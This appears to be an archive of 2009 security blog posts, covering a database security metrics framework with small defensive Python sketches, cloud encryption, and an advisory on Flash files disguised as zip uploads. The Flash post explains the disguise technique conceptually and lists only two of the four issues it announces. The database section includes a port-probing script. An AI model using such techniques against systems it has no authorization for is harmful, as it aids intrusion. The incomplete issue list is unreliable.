Here’s the thing about that 60 Minutes report on cybersecurity from the other week. Yes, some of the facts were clearly wrong. Yes, there are massive political fights under way to see who ‘controls’ cybersecurity, and how much money they get. Some .gov types might have steered the reporters/producers in the wrong direction. The Brazilian power outage probably wasn’t caused by hackers.
But so what?
Here’s what I do know:
- A penetration tester I know who works on power systems recently told me he has a 100% success rate.
- Multiple large enterprises tell me that hackers, quite possibly from China, are all over their networks stealing sensitive data. They keep as many out as they can, but cannot completely get rid of them.
- Large-scale financial cybercrime is costing us hundreds of millions of dollars – and those are just the losses we know about (some of that money is recovered, so I don’t know the true annual total).
Any other security professional with contacts throughout the industry talks to the same people I do, and has the same information.
The world isn’t ending, but even though the story has some of the facts wrong, the central argument isn’t that far off the mark.
Nick Selby did a great write-up on this, and a bunch of the comments are focused on the nits. While we shouldn’t excuse sloppy journalism, some incorrect facts don’t make the entire story wrong.
Posted at Wednesday 18th November 2009 1:50 pm
(0) Comments •
By Adrian Lane
I had to laugh when I read Alan Shimel’s post “Where does Tipping Point fit in the post-3Com ProCurve?” His comment:
I found it insightful that nowhere among all of this did security or Tipping Point get a mention at all. Does HP realize it is part of this deal?
Which was exactly what I was thinking when reading the press releases. One of 3Com’s three pillars is completely absent from the HP press clippings I’ve come across in the last couple of days. Usually there is some mention of everything, to assuage employee fears and avoid having half the headcount leave for ‘new opportunities’. And the product line does not include the all-important cloud or SaaS-based models so many firms are looking for, so selling it off is a plausible course of action.
It was easy to see why Barracuda purchased Purewire: it filled the biggest hole in their product line. The entire market has been moving to a hybrid model, outsourcing many of the resource-intensive features and functions while keeping the core email and web security functions in-house. This lets customers reduce costs with the SaaS service and extend the longevity of existing investments.
Cisco’s acquisition of ScanSafe is similar in that it provides customers with a hybrid model to keep existing IronPort customers happy, as well as a pure SaaS web security offering. I could see this being a standard security option for cloud-based services, ultimately a cloud component, and part of a much larger vision than Barracuda’s.
Which gets me back to Tipping Point and Alan’s question: “Will they just spin it out, so as not to upset some of their security partners?” My guess is not. If I were in charge, I would roll it up with the EDS division acquired earlier this year into a comprehensive managed security services offering. Tipping Point is well entrenched and respected as a product, and both do a lot of business with the government. My guess is this is what they will do. But they need to have the engineering team working on a SaaS offering, and I would like to see them leverage their content analysis capabilities more – perhaps offering what BlueLane did for VMware.
Posted at Wednesday 18th November 2009 11:39 am
(0) Comments •
Here’s our first pass at a high-level process framework for Quant for Databases. Patch management is mostly a contiguous process cycle, but database security encompasses a bunch of different processes. This is a framework I originally used in my Pragmatic Database Security presentation (which I really need to go post now).
I realize this is a lot, but database security is a pretty broad topic – from patch management, to auditing, to configuration, to encryption, to masking, to… you get the idea. The high-level process framework presented here is intended to cover all these tasks. We could really use some feedback on how well it encompasses the full range of database security processes. We based it on our own experience and research contacts, but want to know how you approach these job functions.
Our next step will be to roll through all the sub-processes within each of these major steps. We don’t plan to get as detailed as we did with patch management. Many of the metrics provided in the original Quant project for patch management were extremely granular since we were dealing with only one process. We still need sufficient granularity to develop meaningful metrics that support process optimization, but at a level that’s a little easier to collect, since we are covering a wider range of functions.
Please keep in mind that our philosophy is to build out a large framework with many options, which individual organizations can then pick and choose from. I know not everyone performs all these steps, but this is the best way to build something that works for organizations of different sizes and verticals.
Plan
In this phase we establish the standards and policies that guide the rest of the program. This isn’t a one-time event, since technology and business needs change over time. Standards and policies should account for multiple audiences and external requirements.
- Configuration Standards: Develop security and configuration standards for all supported database platforms.
- Classification Policies: Set policies for how data will be classified. Note that we aren’t saying you need complex data classification, but you do need to establish general policies about the importance of different kinds of data (e.g., PCI related, PII, health information) to properly define security and monitoring requirements.
- Authentication, Authorization, and Access Control Policies: Policies around user management and use of accounts – including connection mechanisms, DBA account policies, DB vs. domain vs. local system accounts, and so on.
- Monitoring Policies: Develop security auditing and monitoring policies, which are often closely tied to compliance requirements.
Discover and Assess
In this phase we enumerate (find) our databases, determine what applications use them, what data they contain, and who owns the system and data; then assess the databases for vulnerabilities and secure configurations. One of the more difficult problems in database security is finding and assessing all the databases in the first place.
- Enumerate databases: Find all the databases in your environment. Determine which are relevant to your task.
- Identify applications, owners, and data: Determine who is responsible for the databases, which applications rely on them, and what data they store. One of your primary goals here is to use the application and data to classify the database by importance and sensitivity of information.
- Assess vulnerabilities and configurations: Perform a configuration and vulnerability assessment on the databases.
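The enumeration step lends itself to simple automation. As a rough sketch – the port-to-platform map is an illustrative assumption, not an exhaustive list, and instances on non-standard ports or behind firewalls will need other discovery methods – a TCP connect scan against default database ports can seed the inventory:

```python
import socket

# Default listening ports for common database platforms (illustrative,
# not exhaustive).
DEFAULT_DB_PORTS = {
    1433: "Microsoft SQL Server",
    1521: "Oracle",
    3306: "MySQL",
    5432: "PostgreSQL",
    50000: "IBM DB2",
}

def probe_host(host, ports=DEFAULT_DB_PORTS, timeout=0.5):
    """Return (port, platform) pairs for database ports open on a host."""
    found = []
    for port, platform in sorted(ports.items()):
        try:
            # A TCP connect scan: success means something is listening,
            # though it may not actually be the assumed database.
            with socket.create_connection((host, port), timeout=timeout):
                found.append((port, platform))
        except OSError:
            pass
    return found
```

Results still need to be reconciled against asset inventories and credentialed scans before they can feed the classification step.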
Secure
Based on the results of our configuration and vulnerability assessments, we update and secure the databases. We also lock down access channels and look for any entitlement (user access) issues. All of these requirements may vary based on the policies and standards defined in the Plan phase.
- Patch: Update the database and host platform to the latest security patch level.
- Configure: Securely configure the database in accordance with your configuration standards. This also includes ensuring the host platform meets security configuration requirements.
- Restrict access: Lock down access channels (e.g., review ODBC connections, ensure communications are encrypted), and check user entitlements for any problems, such as default administrative accounts, orphan accounts, or users with excessive privileges.
- Shield: Many databases have their own network security requirements, such as firewalls or VPNs. Although directly managing firewalls is outside the domain of a database security program, you should still engage with network security to make sure systems are properly protected.
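To make the entitlement checks concrete, here is a minimal Python sketch; the default account list and record layout are assumptions for illustration, and a real review would pull accounts from each platform’s system catalogs:

```python
# Common vendor-default account names (illustrative assumption).
DEFAULT_ACCOUNTS = {"sa", "scott", "system", "root"}

def review_entitlements(accounts):
    """Flag risky accounts.

    accounts: list of dicts with 'name', 'privileges' (a set), and
    'last_login' (None if the account has never been used).
    Returns (account, issue) findings for default accounts, orphan
    accounts, and holders of administrative privileges.
    """
    findings = []
    for acct in accounts:
        if acct["name"].lower() in DEFAULT_ACCOUNTS:
            findings.append((acct["name"], "default account still enabled"))
        if acct["last_login"] is None:
            findings.append((acct["name"], "orphan account (never logged in)"))
        if "DBA" in acct["privileges"]:
            findings.append((acct["name"], "administrative privileges"))
    return findings
```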
Monitor
This phase consists of database activity monitoring and database auditing. We’ll detail the differences later (you can read up on them in the Research Library), but monitoring tends to focus on granular user activity, while auditing is more concerned with traditional audit logs. Both tie into our policies from the Plan phase and vary greatly based on the database involved.
- Database Activity Monitoring: Granular monitoring of database user activity.
- Auditing: Collection, management, and evaluation of database, system, and network audit logs (as relevant to the database).
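As a toy example of evaluating collected audit records against policy – the log format, the privileged-statement pattern, and the DBA account list are all assumptions for illustration:

```python
import re

# Flag privileged statements executed by non-DBA accounts.
PRIVILEGED = re.compile(r"\b(GRANT|DROP|ALTER\s+SYSTEM)\b", re.IGNORECASE)
DBA_ACCOUNTS = {"dba_admin"}

def evaluate_audit_log(lines):
    """lines: iterable of 'user<TAB>statement' records; return violations."""
    violations = []
    for line in lines:
        user, _, stmt = line.partition("\t")
        if PRIVILEGED.search(stmt) and user not in DBA_ACCOUNTS:
            violations.append((user, stmt.strip()))
    return violations
```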
Protect
In this phase we apply preventative controls to protect the data as users and systems interact with it. This includes using Database Activity Monitoring for active alerting, encryption, data masking for data moved to development, and Web Application Firewalls to limit database attacks via web applications.
- Database Activity Monitoring: In the Monitor phase we use DAM to track activity; in this phase we create active policies to generate alerts on violations, or even block activity.
- Encryption: Activities to support and maintain encryption/decryption of database data.
- Data masking: Conversion of production data into less sensitive test data for use in development environments.
- Web Application Firewalls: Since many database breaches result from web application attacks, typically SQL injection, we’ve included WAFs to block those attacks. WAFs are one of the only post-application-deployment tools available to directly address database attacks at the application level. (We considered adding additional application security options, but aside from secure development practices, which are well beyond the scope of this project, WAFs are pretty much the only tool designed to actively protect the database.)
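For data masking, a common technique is deterministic, format-preserving substitution, so the same production value always masks to the same test value and referential integrity survives in development copies. A minimal sketch (not a production masking tool; the salt is an illustrative assumption):

```python
import hashlib
import random
import string

def mask_value(value, salt="quant-demo-salt"):
    """Deterministically mask a string while preserving its format.

    Digits stay digits, letters keep their case, and punctuation is
    left alone, so masked data still passes format validation.
    """
    # Seed a PRNG from a hash of salt + value so the mapping is
    # repeatable across tables and runs.
    seed = hashlib.sha256((salt + value).encode()).digest()
    rng = random.Random(seed)
    return "".join(
        rng.choice(string.digits) if ch.isdigit()
        else rng.choice(string.ascii_uppercase) if ch.isupper()
        else rng.choice(string.ascii_lowercase) if ch.islower()
        else ch
        for ch in value
    )
```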
Manage
The triumvirate of ongoing systems and application management – configuration management, patch management, and change management.
- Configuration management: Keeping systems up to date with configuration standards… including standards that change over time due to new requirements.
- Patch management: Keeping systems up to date with the latest patches.
- Change management: Databases are updated on a regular basis, including structural/schema changes, data cleansing, and so on.
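Configuration management largely reduces to comparing current state against the standard and flagging drift. A minimal sketch, assuming settings can be flattened to key/value pairs (the setting names are illustrative):

```python
def config_drift(standard, actual):
    """Return {setting: (expected, actual)} for deviations from the standard.

    Settings missing from the current state show up with an actual
    value of None.
    """
    return {
        key: (expected, actual.get(key))
        for key, expected in standard.items()
        if actual.get(key) != expected
    }

# Illustrative standard for a hypothetical database host
STANDARD = {"remote_os_auth": False, "audit_trail": True, "sample_schemas": False}
```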
Yes – that’s a whole heck of a lot of territory to cover, which is why I stayed fairly terse in this post. In talking with Adrian (who is co-leading this project), we think most organizations lump this activity into three buckets/sub-processes:
- Normal database management activities: primarily configuration and patch management – typically managed by database administrators.
- Database assessment.
- Monitoring and auditing.
No, that doesn’t capture everything in the main process, but that’s how most organizations that have database security programs break things out. We have simplified the tasks at the high level, but requirements and policies may come from groups external to database operations – such as security, privacy, audit, and compliance. If you are a DBA reading this overview, you could go through this exercise to build out your cost model for simple operations very quickly. The model will hopefully scale just as well for organizations with more complex systems, but will take longer to account for all of your requirements.
This brings up two big questions we could use some help with:
- Does the structure work? You’ll notice I didn’t list this out as one straight process, but as a series of ongoing, overlapping, and related processes.
- Are we missing anything? Should we move anything? Insert, update or delete?
Thanks… in our next posts we’re going to start walking through the model and detailing all the sub-processes so we can come back to them and build out the metrics.
Index to other posts in Project Quant for Database Security.
- An Open Metrics Model for Database Security: Project Quant for Databases.
- Database Security: Process Framework.
- Database Security: Planning.
- Database Security: Planning, Part 2.
- Database Security: Discover and Assess Databases, Apps, Data.
- Database Security: Patch.
- Database Security: Configure.
- Database Security: Restrict Access.
- Database Security: Shield.
- Database Security: Database Activity Monitoring.
- Database Security: Audit.
- Database Security: Database Activity Blocking.
- Database Security: Encryption.
- Database Security: Data Masking.
- Database Security: Web App Firewalls.
- Database Security: Configuration Management.
- Database Security: Patch Management.
- Database Security: Change Management.
- DB Quant: Planning Metrics, Part 1
- DB Quant: Planning Metrics, Part 2
Posted at Wednesday 18th November 2009 10:03 am
(4) Comments •
By Adrian Lane
I was reading PC Magazine’s recap of Ray Ozzie’s announcement of the Azure cloud computing platform.
The vision of Azure, said Ozzie, is “… three screens and a cloud,” meaning Internet-based data and software that plays equally well on PCs, mobile devices, and TVs.
I am already at a stage where almost everything I want to do on the road I can accomplish with my smartphone; any heavy lifting waits for the desktop. I am sure we will quickly reach a point where there is no longer a substantial barrier, and I can perform most tasks (with varying degrees of agility) with whatever device I have handy.
“We’re moving into an era of solutions that are experienced by users across PCs, phones and the Web, and that are delivered from datacenters we refer to as private clouds and public clouds.”
But I read this just after combing through the BitLocker specifications, and the dichotomy of the old school model and new cloud vision seemed at odds.
With cloud computing we are going to see data encryption become common. We are going to be pushing data into the cloud, where we do not know what security will be provided, and we may not have thoroughly screened the contents prior to moving it. Encryption, especially when the data is stored separately from the keys and encryption engine, is a very good approach to keeping data private and secure. But given the generic nature of the computing infrastructure, the solutions will need to be flexible enough to support many different environments.
Microsoft’s data security solution set includes several ways to encrypt data: BitLocker is available for full drive encryption on laptops and workstations. Windows Mobile Device Manager will manage security on your mobile storage and mobile application data encryption. Exchange can manage email and TLS encryption. SQL Server offers transparent and API-level encryption.
But BitLocker’s architecture seems a little odd when compared to the others, especially in light of the cloud-based vision. It has hardware and BIOS requirements to run. Its key management, key recovery, and backup interfaces differ from those for other mobile devices and applications. BitLocker’s architecture does not seem like it could be stretched to support other mobile devices. Given that this is a major new launch, something a little more platform-neutral would make sense.
If you are an IT manager, do you care? Is it acceptable to you? Does your device security belong to a different group than platform security? The offerings seem scattered to me. Rich does not see this as an issue, as each solves a specific problem relevant to the device in question and key management is localized. I would love to hear your thoughts on this.
I also learned that there is no current plan for Transparent Database Encryption with SQL Azure. That means developers using SQL Azure who want data encryption will need to take on the burden at the application level. This is fine, provided your key management and encryption engine are not in the cloud. But since this is geared for use with the Azure application platform, you will probably have those in the cloud as well. Be careful.
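To illustrate the pattern rather than any Microsoft API: application-level encryption only protects you in the cloud if the key and the encryption engine stay on your side of the wire, with only ciphertext stored in SQL Azure. The hash-based keystream below is a toy stand-in so the sketch stays self-contained – real code should use a vetted cipher from a maintained library:

```python
import hashlib
from itertools import count

def _keystream(key: bytes, nonce: bytes):
    # SHA-256 in counter mode as a toy keystream. Illustrative only;
    # use a vetted algorithm (e.g., AES) in production.
    for i in count():
        yield from hashlib.sha256(key + nonce + i.to_bytes(8, "big")).digest()

def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    # The key stays in the application tier; only the ciphertext is
    # written to the cloud database.
    return bytes(b ^ k for b, k in zip(plaintext, _keystream(key, nonce)))

decrypt = encrypt  # an XOR stream cipher is its own inverse
```

The point is architectural: if the key management moves into the cloud alongside the application, the encryption buys you much less.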
Posted at Wednesday 18th November 2009 6:33 am
(0) Comments •
By Adrian Lane
Rich and I were on a data security Q&A podcast today. I was surprised when the audience asked questions about Application & Database Monitoring and Protection (ADMP), as it was not on our agenda, nor have we written about it in the last year. When Rich first sketched out the concept, he listed specific market forces behind ADMP, and presented a couple of ADMP models. But those were really discussions of the technical challenges of management and security, and the projected synergies if the two were linked. When we were asked about ADMP today, I was able to name a half dozen vendors implementing parts of the model, each with customers who have deployed their solutions. ADMP is no longer a philosophical discussion of technical synergies but a reality, due to customer acceptance.
I see the evolution of ADMP as very similar to what happened with web and email security. Just a couple of years ago there was a sharp division between email security and web security vendors. That market has evolved from the point solutions of email security, anti-virus, email content security, anti-malware, web content filtering, URL filtering, TLS, and gateway services into single platforms. In customers’ minds the problem is monitoring and controlling how employees use the Internet. The evolution of Symantec, Websense, Proofpoint, and Barracuda are all examples, and it is nearly impossible for any collection of point technologies to compete with these unified platforms.
ADMP is about monitoring and controlling use of web applications.
A year ago I would have discussed the need for ADMP’s technical benefits, due to having all products under one management interface. The ability to write one policy to direct multiple security functions. The ability for discovery from one component to configure other features. The ability to select the most appropriate tool or feature to address a threat, or even provide some redundancy. ADMP became a reality when customers began viewing web application monitoring and control as a single problem. Successful relationships between database activity monitoring vendors, web app firewalls companies, pen testers, and application assessment firms are showing value and customer acceptance. We have a long, long way to go in linking these technologies together into a robust solution, but the market has evolved a lot over the last 14 months.
Posted at Tuesday 17th November 2009 5:23 pm
(0) Comments •
Thanks to my wife’s job at a hospital, yesterday I was able to finally get my H1N1 flu shot. While driving down, I was also listening to a science podcast talking about the problems when the government last rolled out a big flu vaccine program in the 1970s. The epidemic never really hit, and there was a much higher than usual complication rate with that vaccine (don’t let this scare you off – we’ve had 30 years of improvement since then). The public was justifiably angry, and the Ford administration took a major hit over the situation.
Recently I also read an article about the Y2K “scare”, and how none of the fears panned out. Actually, I think it was a movie review for 2012, so perhaps I shouldn’t take it too seriously.
In many years of being involved with risk-based careers, from mountain rescue and emergency medicine to my current geeky stuff, I’ve noticed a constant trend by majorities to see risk management successes as failures. Rather than believing that the hype was real and we actually succeeded in preventing a major negative event, most people merely interpret the situation as an overhyped fear that failed to manifest. They thus focus on the inconvenience and cost of the risk mitigation, as opposed to its success.
Y2K is probably one of the best examples. I know of many cases where we would have experienced major failures if it weren’t for the hard work of programmers and IT staff. We faced a huge problem, worked our asses off, and got the job done. (BTW – if you are a runner, this Nike Y2K commercial is probably the most awesomest thing ever.)
This behavior is something we constantly wrestle with in security. The better we do our job, the less intrusive we (and the bad guys) are, and the more invisible our successes. I’ve always felt that security should never be in the spotlight – our job is to disappear and not be noticed. Our ultimate achievement is absolute normalcy.
In fact, our most noticeable achievements are failures. When we swoop in to clean up a major breach, or are dangling on the end of a rope hanging off a cliff, we’ve failed. We failed to prevent a negative event, and are now merely cleaning up.
Successful risk management is a failure because the more we succeed, the more we are seen as irrelevant.
Posted at Tuesday 17th November 2009 8:17 am
(1) Comments •
By Adrian Lane
I was working at Unisys two decades ago when I first got into the discussion of what traits, characteristics, or skills to look for in programmer candidates we interviewed. One of the elder team members shocked me when he said he tried to hire musicians regardless of prior programming experience. His feeling was that anyone could learn a language, but people who wrote music understood composition and flow, far harder skills to teach. At the time I thought I understood what he meant, that good code has very little to do with individual statements or the programming language used. And the people he hired did make mistakes with the language, but their applications were well thought out. Still, it took 10 years before I fully grasped why this approach worked.
I got to thinking about this today when Rich forwarded me the link to Esther Schindler’s post “If the comments are ugly, the code is ugly”.
Perhaps my opinion is colored by my own role as a writer and editor, but I firmly believe that if you can’t take the time to learn the syntax rules of English (including “its” versus “it’s” and “your” versus “you’re”), I don’t believe you can be any more conscientious at writing code that follows the rules. If you are sloppy in your comments, I expect sloppiness in the code.
Thoughtful and well written, but horseshit nonetheless! Worse, it is a red herring. The quality of code lies in its suitability to perform the task it was designed to do. The goal should not be to please a spell checker.
Like it or not, there are very good coders who are terrible at putting comments into the code, and what comments they provide are gibberish. They think like coders. They don’t think like English majors. And yes, I am someone who writes like English was my second language, and codes like Java was my first. I am just more comfortable with the rules and uses. We call Java and C++ ‘languages’, which seems to invite comparison, or cause some to equate the two things. But make no mistake: trying to extrapolate some common metric of quality is simply nuts. It is both a terrible premise, and the wrong perspective for judging a software developer’s skills. Any relevance of human language skill to code quality is purely accidental.
I have gotten to the point in my career where a lack of comments in code can mean the code is of higher quality, not lower. Why? Likely the document first, code later process was followed. When I started working with seasoned architects for the first time, we documented everything long before any code was written. And we had an entire hierarchy of documents, with the first layer covering the goals of the project, the second layer covering the major architectural components and data flow, the third layer covering design issues and choices, and finally documentation at the object level. These documents were checked into the source code control system along with the code objects for reference during development. There were fewer comments in the code, but a lot more information was readily available.
Good programs may have spelling errors in the comments. They may not have comments at all. They may have one or two logic flaws. Mostly irrelevant. I call the above post a red herring because it tries to judge software quality using spelling as a metric, as opposed to more relevant attributes such as:
- The number of bugs in any given module (on a per-developer basis if I can tell).
- The complexity or effort required to fix these bugs.
- How closely the code matches the design specifications.
- Uptime during stress testing.
- How difficult it is to alter or add functionality not provided for in the original design.
- The inclusion of debugging flags and tools.
- The inclusion of test cases with source code.
The number of bugs is far more likely to be an indicator of sloppiness, mis-reading the design specification, bad assumptions, or bogus use cases. The complexity of the fix usually tells me, especially with new code, if the error was a simple mistake or a major screw-up. Logic errors need to be viewed in the same way. Finally, test cases and debugging built into the code are a significant indicator that the coder was thinking about the important data points in the code. Witnessing code behavior has been far more helpful for debugging code than inline comments. Finding ‘breadcrumbs’ and debugging flags is a better indication of a skilled coder than concise grammatically correct comments.
I know some very good architects whose code and comments are sloppy. There are a number of reasons for this, primarily that coding is no longer their primary job. Most follow coding practices because heck, they wrote them. And if they are responsible for peer review this is a form of self preservation and education for their reviewees. But their most important skill is an understanding of business goals, architecture, and 4GL design. These are the people I want laying out my object models. These are the people I want stubbing out objects and prototyping workflow. These are the people I want choosing tools and platforms. Attention to detail is a prized attribute, but some details are more important than others. The better code I have seen comes from those who have the big picture in mind, not those who fuss over coding standards. Comments save time if professional code review (outsourced or peer) is being used, but a design specification is more important than inline comments.
There is another angle to consider here, and that is coding in the open source community is a bit different than working for “The Man”. This is because the eyes of your peers are on you. Not just one or two co-workers, but an entire community. Peer pressure is a great way to get better quality code. Misspellings will earn you a few private email messages pointing out your error, but sloppy programming habits invite public ridicule and scorn. Big motivator.
Still, I maintain in-code comments are of limited value – an old model for development that went out of fashion with Pascal in the enterprise. We have source code control systems that allow us to keep documentation with code segments. Better still are design documents that describe what should be, whereas code comments describe what ‘is’ and explain the small idiosyncrasies of the implementation due to language, platform, or compatibility limitations.
Spelling as a quality indicator… God, if it were only that easy!
Posted at Monday 16th November 2009 2:48 pm
(8) Comments •
By Rich
One of the more vexing problems in information security is our lack of metrics models for measuring and optimizing security efforts. We tend to lack frameworks and metrics to help measure the efficiency and effectiveness of security programs. This makes it more difficult both to improve our processes, and to communicate our value to non-technical decision makers.
I’m not saying we don’t have any metrics. In recent years we’ve come a long way, with developments such as the Center for Internet Security’s Consensus Metrics and the work of Andrew Jaquith and the Security Metrics community. For the most part these metrics fall into two broad categories: program metrics, and risk/threat models.
One area that has been generally lacking – not to take anything away from the other two categories – is detailed process-oriented models for improving efficiency and effectiveness within specific security areas. In other words, instead of just determining whether a particular process is an overall improvement, such as by measuring time to patch managed systems (efficiency) or percentage of overall systems patched (effectiveness), we lack tools for examining the individual steps within the process for finer-grained changes. Such detailed measurements can help us figure out how much it costs to patch, identify where and why our patching might be slower than desired (and thus how to make it faster), and determine why certain systems fall between the gaps and aren’t patched. Our higher-level models help us evaluate risk and overall security programs, while detailed metrics would be useful for performance optimization.
Our first attempt at building a security performance optimization model focused on patch management, and we called it Project Quant. Over about 6 months we built a standard process framework for patch management, with heavy community participation, and then identified a series of detailed metrics for each step in the process. We ended up with about 40 steps in 10 main phases, with well over 100 potential metrics, prioritized so you can focus on a few key areas – because few people have the resources to measure them all.
About a month ago we were approached by a database security vendor to see if we could do the same thing for database security. This vendor, Application Security Inc., wanted an open, public, objective framework to measure the potential costs associated with database security. As with the initial Project Quant, which was sponsored by Microsoft, we agreed to proceed with the project as long as we could maintain our Totally Transparent Research policy. In other words, all the work has to be done in public, and the sponsor must participate through the same public mechanisms (comments and forum posts) as anyone else.
This project aligns very well with our research coverage, and we’ve been looking for an excuse to build out more-detailed database security process models for some time now. We also realized the format we used for Project Quant works well for other process-based metrics models. Thus we’re proud to introduce Project Quant for Database Security, and we will now refer to the initial project as Project Quant for Patch Management.
Based on what we have learned to date in Project Quant, this is how the project will proceed:
- We will, with community involvement, build out a high-level process framework for database security (see the patch management cycle for an example).
- Once the high level process looks good, we will build out detailed steps for each phase of the higher-level process, and solicit public feedback and involvement.
- We will build out sub-phase processes that help define tasks, and identify metrics for each step. Metrics will be hard costs in dollars (hardware/software), or time to complete the step. In some cases we will also include some effectiveness metrics (e.g., success vs. failure rates), but the primary focus of the model is costs/efficiency.
- We will classify the metrics by importance and identify key metrics. We learned in the first Project Quant that it’s easy to identify a large number of potential metrics, but most people need only focus on a few that they can measure with a reasonable investment – once again, some metrics are expensive enough to measure that they would be a poor investment for some (or even most) organizations.
- Where possible, we will support the research with open surveys and interviews.
- Absolutely all the research will be conducted out in the open to maintain objectivity. All public comments will be retained as part of the project record, and no comments will be filtered except for spam and off-topic content. The sponsor is only allowed to participate through the same public mechanisms, so their financial involvement can’t influence the result. (As with all our contracts, the sponsor doesn’t have to pay if the result doesn’t meet their needs due to our objectivity requirements).
- Anyone can participate – other security vendors, database and security professionals, database vendors, or anyone with too much time on their hands. If you work for a database or database security vendor, we ask that you disclose the company you are with.
- All materials will be released under a Creative Commons license.
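A cost-focused metric of the kind described above can be sketched as a simple record. The step name, rate, and dollar figures below are hypothetical illustrations, not part of the Quant model itself:

```python
from dataclasses import dataclass

@dataclass
class StepMetric:
    """One measurable step in a database security process (hypothetical fields)."""
    step: str
    hours: float           # time to complete the step
    hourly_rate: float     # fully loaded labor cost per hour
    hard_cost: float = 0.0 # hardware/software dollars attributable to the step

    def total_cost(self) -> float:
        # Hard costs in dollars plus time converted to dollars
        return self.hours * self.hourly_rate + self.hard_cost

# Example: the cost of configuring an assessment scan (numbers are made up)
metric = StepMetric(step="configure assessment scan",
                    hours=4.0, hourly_rate=90.0, hard_cost=500.0)
print(metric.total_cost())  # 860.0
```

The point of keeping each step's metric this simple is the lesson from the first Project Quant: most organizations can only afford to measure a handful of key metrics.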
Since database security is more diverse than patch management, we expect to identify multiple sub-processes as part of an overall program. For example, assessment and monitoring aren’t necessarily part of a contiguous cycle like most of the phases of patch management. Because this scope is also wider, we don’t plan on delving into the same level of detail on the metrics as we did with patch management. To be honest, we probably went too deep, and included far more metrics than anyone could reasonably collect using current technologies.
In terms of timeline we are shooting to complete this project around the end of January or early February.
So let us know what you think. We’ll start posting initial thoughts on the process model tomorrow, and start cranking through it from there. We’ll keep all material in the Project Quant site, and will update the Research Library to reflect that we’re now expanding Quant into other security areas. You can find a complete Table of Contents in the Process Framework post.
Posted at Monday 16th November 2009 1:31 pm
(4) Comments •
I was talking with security researcher Mike Bailey over the weekend, and there’s a lot of confusion around his disclosure last week of a combination of issues with Adobe Flash that lead to some worrisome exploit possibilities. Mike posted his original information and an FAQ. Adobe responded, and Mike followed up with more details.
The reason this is a bit confusing is that there are four related but independent issues that contribute to the problem.
- Flash ignores file extensions and content headers. The Flash player built into all of our browsers will execute any file that has Flash file headers, which means it ignores HTTP content headers. Some sites assume content can’t execute because they don’t label it as runnable in the HTML or through the HTTP headers. If they don’t specifically filter the content type, though, and allow a Flash object anywhere in the page, it will run – in their context. Running in the context of the containing page/site is expected, but execution despite content labeling is often unexpected and can be dangerous. Most sites filter or otherwise mark images and other major uploadable content types, but if they have a field for a .zip file or a document and don’t filter it (though many sites do), the content will run.
- Flash files can impersonate other file types. A bad guy can take a Flash program, append a .zip file, and give it a .zip file extension. To any ZIP parser that’s a valid zip file, not a Flash file. This also applies to other file types, such as the .docx/pptx/xlsx zipped XML formats preferred by current versions of MS Office. As mentioned in the first point, many servers screen potentially-unsafe file types such as zip. Such hybrid files are totally valid zip archives, but simultaneously executable Flash files. If the site serves up such a file (as many bulletin boards and code-sample sites do), the Flash plugin will recognize and execute the Flash component, even though it looks more like a zip file to humans and file scanners.
Thus we have four problems – three of which Adobe can fix – that create new exploit scenarios for attackers. Attackers can sneak Flash files into places where they shouldn’t run, and can design these malicious applications to allow them to manipulate the hosting site in ways that shouldn’t be possible. This works on some common platforms if they enable file uploads (Joomla, Drupal), as well as some of the sites Mike references in his posts.
This isn’t an end-of-the-world kind of problem, but is serious enough that Adobe should address it. They should force Flash to respect HTTP headers, and could easily filter out “disguised” Flash files. Flash should also respect the same origin policy, and not allow the hosting site to affect the presenting site.
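Filtering out “disguised” Flash files server-side can be sketched by checking the leading bytes of an upload for the SWF magic signature, rather than trusting the extension or the declared content type. This is a minimal illustration of the idea, not Adobe’s or any particular site’s actual filter:

```python
# SWF files begin with a three-byte signature regardless of extension:
# "FWS" (uncompressed) or "CWS" (zlib-compressed); later Flash versions
# added an LZMA "ZWS" variant.
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")

def looks_like_flash(data: bytes) -> bool:
    """Return True if the Flash player would treat this content as a SWF."""
    return data[:3] in SWF_SIGNATURES

# A Flash-file/zip hybrid still starts with a SWF header, so it is caught
# even though a ZIP parser would accept it as a valid archive:
print(looks_like_flash(b"CWS\x09" + b"\x00" * 16))  # True
print(looks_like_flash(b"PK\x03\x04"))              # False: a genuine zip archive
```

A real upload filter would sniff other executable formats as well, but even this three-byte check would block the hybrid files described above.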
This issue is definitely more serious than Adobe is saying, and hopefully they’ll change their position and fix the parts of it that are under their control.
Posted at Monday 16th November 2009 10:39 am
(1) Comments •
By David Mortman
I recently had the pleasure to present at a local CIO conference. There were about 50 CIOs in the room, ranging from .edu folks, to start-ups, to the CIOs of major enterprises including a large international bank and a similarly large insurance company. While the official topic for the event was “the cloud”, there was a second underlying theme – that CIOs needed to learn how to talk to the business folks on their terms and also how to make sure that IT wasn’t being a roadblock but rather an enabler of the business. There was a lot of discussion and concern about the cloud in general – driven by business’ ability to take control of infrastructure away from IT – so while everybody agreed that communicating with the business should always have been a concern, the cloud has brought this issue to the fore.
This all sounds awfully familiar, doesn’t it? For a while now I’ve been advocating that we as an industry need to be doing a better job communicating with the business, and I stand behind that argument today. But I hadn’t realized how fortunate I was to work with several CIOs who had already figured it out. It’s now pretty clear to me that many CIOs are still struggling with this, and that it is not necessarily a bad thing. It means, however, that while the CIO is still an ally as you work to communicate better with the business, it is now important to keep in mind that the CIO might be more of a direct partner than a mentor. Either way, having someone to work with on improving your messaging is important – it’s like having an editor (Hi Chris!) when writing. That second set of eyes is really important for ensuring the message is clear and concise.
Posted at Monday 16th November 2009 9:51 am
(1) Comments •
We talk a lot about the role of anonymization on the Internet. On one hand, it’s a powerful tool for freedom of speech. On the other, it creates massive security challenges by greatly reducing attackers’ risk of apprehension.
The more time I spend in security, the more I realize that economics plays a far larger role than technology in what we do.
Anonymization, combined with internationalization, shifts the economics of online criminal activity. In the old days to rob or hurt someone you needed a degree of physical access. The postal and phone systems reduced the need for this access, but also contain rate-limiters that reduce scalability of attacks. Physical access corresponds to physical risk – particularly the risk of apprehension. A lack of sufficient international cooperation (or even consistent international laws), combined with anonymity, and the scope and speed of the Internet, skew the economics in favor of the bad guys. There is a lower risk of capture, a lower risk of prosecution, limited costs of entry, and a large (global) scope for potential operations.
Heck, with economics like that, I feel like an idiot for not being a cybercriminal.
In security circles we spend a lot of time talking about the security issues of anonymity and internationalization, but these really aren’t the problem. The real problem isn’t the anonymity of users, but the anonymity of losses.
